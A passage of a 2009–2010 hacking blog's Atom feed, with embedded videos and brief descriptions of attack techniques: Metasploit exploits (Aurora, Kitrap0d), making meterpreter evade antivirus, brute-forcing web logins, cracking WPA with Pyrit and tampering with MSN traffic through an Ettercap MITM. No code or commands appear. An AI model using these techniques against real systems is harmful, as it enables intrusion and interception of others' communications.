&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;# ITS™ &lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;# 2009 - 2010&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/3548021762745247536/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2010/05/root-shell-via-metasploit-and-mysql.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/3548021762745247536'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/3548021762745247536'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2010/05/root-shell-via-metasploit-and-mysql.html' title='Root Shell via Metasploit and MySQL Client on Metasploitable'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-2081251266849852870</id><published>2010-03-10T02:38:00.000-08:00</published><updated>2010-03-10T02:38:26.260-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Fireforce"/><title type='text'>Using Fireforce to brute-force web login forms</title><content type='html'>&lt;object height=&quot;344&quot; width=&quot;425&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/yNa7AlnrtG0&amp;hl=en_US&amp;fs=1&amp;rel=0&amp;color1=0x234900&amp;color2=0x4e9e00&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;&lt;embed src=&quot;http://www.youtube.com/v/yNa7AlnrtG0&amp;hl=en_US&amp;fs=1&amp;rel=0&amp;color1=0x234900&amp;color2=0x4e9e00&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;425&quot; height=&quot;344&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;Fireforce is a Firefox extension designed to perform brute-force attacks on GET and POST forms. Fireforce can use dictionaries or generate passwords based on several character types. Attacks can be performed on two separate fields using two distinct password sources. Fireforce can be used on any platform running the Firefox web browser and is distributed under GPL licence. &lt;a href=&quot;http://www.scrt.ch/pages_en/fireforce.html&quot;&gt;You can download it from here.&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;ITS™&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;2009-2010&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/2081251266849852870/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2010/03/using-fireforce-to-brute-force-web.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/2081251266849852870'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/2081251266849852870'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2010/03/using-fireforce-to-brute-force-web.html' title='Using Fireforce to brute-force web login forms'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-377502685992032227</id><published>2010-02-25T02:28:00.000-08:00</published><updated>2010-02-25T02:28:05.878-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Honeypot"/><title type='text'>Setting up the HoneyBot Honeypot</title><content type='html'>&lt;embed allowfullscreen=&quot;true&quot; allowscriptaccess=&quot;always&quot; height=&quot;300&quot; src=&quot;http://blip.tv/play/AYG%2Bz3oC&quot; type=&quot;application/x-shockwave-flash&quot; width=&quot;410&quot;&gt;&lt;/embed&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;A Honeypot is a device placed on a computer network specifically designed to capture malicious network traffic. The logging capability of a honeypot is far greater than any other network security tool and captures raw packet level data even including the keystrokes and mistakes made by hackers. The captured information is highly valuable as it contains only malicious traffic with little to no false positives. Honeypots are becoming one of the leading security tools used to monitor the latest tricks and exploits of hackers by recording their every move so that the security community can more quickly respond to new exploits.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://www.atomicsoftwaresolutions.com/honeybot.php&quot;&gt;HoneyBOT&lt;/a&gt; works by opening a large range of listening sockets on your computer from which a selection of these sockets are designed to mimic vulnerable services. When an attacker connects to these services they are fooled into thinking they are attacking a real server. The honeypot safely captures all communications with the attacker and logs these results for future analysis. Should an attacker attempt an exploit or upload a rootkit or trojan to the server the honeypot environment can safely store these files on your computer for malware collection and analysis purposes. &quot; &lt;a href=&quot;http://www.atomicsoftwaresolutions.com/honeybot.php&quot;&gt;Download HoneyBot Honeypot &lt;/a&gt;&quot; &lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;# ITS™ ©&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;# 2009 - 2010&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/377502685992032227/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2010/02/setting-up-honeybot-honeypot.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/377502685992032227'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/377502685992032227'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2010/02/setting-up-honeybot-honeypot.html' title='Setting up the HoneyBot Honeypot'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-4187243910976163364</id><published>2010-02-25T02:18:00.000-08:00</published><updated>2010-02-25T02:18:27.598-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Static Analysis"/><title type='text'>From Static Analysis to 0day Exploit</title><content type='html'>&lt;object classid=&quot;clsid:D27CDB6E-AE6D-11cf-96B8-444553540000&quot; height=&quot;370&quot; id=&quot;viddler&quot; width=&quot;437&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.viddler.com/player/2af2aaf3/&quot; /&gt;&lt;param name=&quot;allowScriptAccess&quot; value=&quot;always&quot; /&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot; /&gt;&lt;param name=&quot;flashvars&quot; value=&quot;fake=1&quot;/&gt;&lt;embed src=&quot;http://www.viddler.com/player/2af2aaf3/&quot; width=&quot;437&quot; height=&quot;370&quot; type=&quot;application/x-shockwave-flash&quot; allowScriptAccess=&quot;always&quot; allowFullScreen=&quot;true&quot; flashvars=&quot;fake=1&quot; name=&quot;viddler&quot; &gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;# ITS ©&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;# 2009 - 2010&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/4187243910976163364/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2010/02/from-static-analysis-to-0day-exploit.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/4187243910976163364'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/4187243910976163364'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2010/02/from-static-analysis-to-0day-exploit.html' title='From Static Analysis to 0day Exploit'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-1348273399869042005</id><published>2010-02-03T11:23:00.000-08:00</published><updated>2010-02-03T11:23:46.805-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="metasploit"/><title type='text'>Kitrap0d in Metasploit 3.3.4 Dev</title><content type='html'>&lt;object height=&quot;225&quot; width=&quot;400&quot;&gt;&lt;param name=&quot;allowfullscreen&quot; value=&quot;true&quot; /&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot; /&gt;&lt;param name=&quot;movie&quot; value=&quot;http://vimeo.com/moogaloop.swf?clip_id=9028433&amp;amp;server=vimeo.com&amp;amp;show_title=0&amp;amp;show_byline=0&amp;amp;show_portrait=0&amp;amp;color=ff9933&amp;amp;fullscreen=1&quot; /&gt;&lt;embed src=&quot;http://vimeo.com/moogaloop.swf?clip_id=9028433&amp;amp;server=vimeo.com&amp;amp;show_title=0&amp;amp;show_byline=0&amp;amp;show_portrait=0&amp;amp;color=ff9933&amp;amp;fullscreen=1&quot; type=&quot;application/x-shockwave-flash&quot; allowfullscreen=&quot;true&quot; allowscriptaccess=&quot;always&quot; width=&quot;400&quot; height=&quot;225&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;&quot;&gt;# ITS ©&lt;/div&gt;&lt;div style=&quot;font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;&quot;&gt;# 2009 - 2010&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/1348273399869042005/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2010/02/kitrap0d-in-metasploit-334-dev.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/1348273399869042005'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/1348273399869042005'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2010/02/kitrap0d-in-metasploit-334-dev.html' title='Kitrap0d in Metasploit 3.3.4 Dev'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-9118440344824435366</id><published>2010-02-03T11:20:00.000-08:00</published><updated>2010-02-03T11:20:51.335-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="metasploit"/><title type='text'>The Aurora  IE Exploit in Metasploit</title><content type='html'>&lt;object height=&quot;295&quot; width=&quot;480&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/n3ylpobYbg8&amp;hl=en_US&amp;fs=1&amp;rel=0&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;&lt;embed src=&quot;http://www.youtube.com/v/n3ylpobYbg8&amp;hl=en_US&amp;fs=1&amp;rel=0&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;480&quot; height=&quot;295&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;# ITS ©&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;# 2009 - 20010&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/9118440344824435366/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2010/02/aurora-ie-exploit-in-metasploit.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/9118440344824435366'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/9118440344824435366'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2010/02/aurora-ie-exploit-in-metasploit.html' title='The Aurora  IE Exploit in Metasploit'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-1366015167113182590</id><published>2009-12-31T11:22:00.001-08:00</published><updated>2009-12-31T11:22:55.331-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Happy New Year"/><title type='text'>Happy New Year 2010 !!</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://static-p4.fotolia.com/jpg/00/06/24/47/400_F_6244789_y4MtdCzJMxv2zQDKVWkr9JwMEWaggjIU.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://static-p4.fotolia.com/jpg/00/06/24/47/400_F_6244789_y4MtdCzJMxv2zQDKVWkr9JwMEWaggjIU.jpg&quot; width=&quot;296&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;# ITS ©&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;# 2008 - 2009&lt;br /&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/1366015167113182590/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2009/12/happy-new-year-2010.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/1366015167113182590'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/1366015167113182590'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2009/12/happy-new-year-2010.html' title='Happy New Year 2010 !!'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-1530424045747267373</id><published>2009-11-30T02:28:00.000-08:00</published><updated>2009-11-30T02:30:56.674-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="metasploit"/><title type='text'>Metasploit AV Evasion Technique</title><content type='html'>&lt;object height=&quot;300&quot; width=&quot;400&quot;&gt;&lt;param name=&quot;allowfullscreen&quot; value=&quot;true&quot; /&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot; /&gt;&lt;param name=&quot;movie&quot; value=&quot;http://vimeo.com/moogaloop.swf?clip_id=7613487&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1&quot; /&gt;&lt;embed src=&quot;http://vimeo.com/moogaloop.swf?clip_id=7613487&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1&quot; type=&quot;application/x-shockwave-flash&quot; allowfullscreen=&quot;true&quot; allowscriptaccess=&quot;always&quot; width=&quot;400&quot; height=&quot;300&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;a href=&quot;http://vimeo.com/7613487&quot;&gt;&lt;/a&gt;  &lt;a href=&quot;http://vimeo.com/doublezer0&quot;&gt;&lt;/a&gt; &lt;a href=&quot;http://vimeo.com/&quot;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif; font-size: small;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;How to modify the meterpreter binary and make it undetectable by an Anti-Virus.&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;# ITS™ &lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;# 2008 - 2009&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/1530424045747267373/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2009/11/metasploit-av-evasion-technique.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/1530424045747267373'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/1530424045747267373'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2009/11/metasploit-av-evasion-technique.html' title='Metasploit AV Evasion Technique'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-3466819833090265397</id><published>2009-11-22T14:00:00.000-08:00</published><updated>2009-11-22T14:00:49.755-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Pyrit"/><title type='text'>Hacking WPA with Pyrit</title><content type='html'>&lt;object height=&quot;295&quot; width=&quot;380&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/KOmacSCmlbY&amp;hl=en_US&amp;fs=1&amp;rel=0&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;&lt;embed src=&quot;http://www.youtube.com/v/KOmacSCmlbY&amp;hl=en_US&amp;fs=1&amp;rel=0&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;380&quot; height=&quot;295&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif; text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://code.google.com/p/pyrit/&quot;&gt;Pyrit&lt;/a&gt; &lt;/span&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocols that protect today&#39;s public WIFI-airspace. Pyrit&#39;s implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol&#39;s security. Exploiting the computational power of Many-Core- and other platforms through ATI-Stream, Nvidia CUDA, OpenCL and VIA Padlock.&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif; text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;# ITS ©&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;# 2008 - 2009&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/3466819833090265397/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2009/11/hacking-wpa-with-pyrit.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/3466819833090265397'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/3466819833090265397'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2009/11/hacking-wpa-with-pyrit.html' title='Hacking WPA with Pyrit'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-7310273237601741273</id><published>2009-11-22T13:57:00.000-08:00</published><updated>2009-11-22T13:57:32.032-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Ettercap"/><title type='text'>Modifying an MSN Conversation using an Ettercap Filter</title><content type='html'>&lt;object height=&quot;265&quot; width=&quot;320&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/phJ-zonyb3Y&amp;hl=en_US&amp;fs=1&amp;rel=0&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;&lt;embed src=&quot;http://www.youtube.com/v/phJ-zonyb3Y&amp;hl=en_US&amp;fs=1&amp;rel=0&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;320&quot; height=&quot;265&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style=&quot;font-family: Arial,Helvetica,sans-serif; font-weight: normal; text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;In this video, Thomas shows us how to modify an MSN conversation at the network level. He uses an Ettercap filter and MITM attack to make this happen. The basic idea is to hijack the victim&#39;s Layer 2 and have all his traffic go through the attacker. Then the attacker can modify the traffc on the fly and inject it back into the network. &lt;/span&gt;&lt;/h2&gt;# ITS ©&lt;br /&gt;
# 2008 - 2009</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/7310273237601741273/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2009/11/modifying-msn-conversation-using.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/7310273237601741273'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/7310273237601741273'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2009/11/modifying-msn-conversation-using.html' title='Modifying an MSN Conversation using an Ettercap Filter'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-4224621903270930798</id><published>2009-11-13T10:28:00.001-08:00</published><updated>2009-11-13T10:28:53.348-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Gmail Flash Exploit"/><title type='text'>Gmail Flash Exploit</title><content type='html'>&lt;object 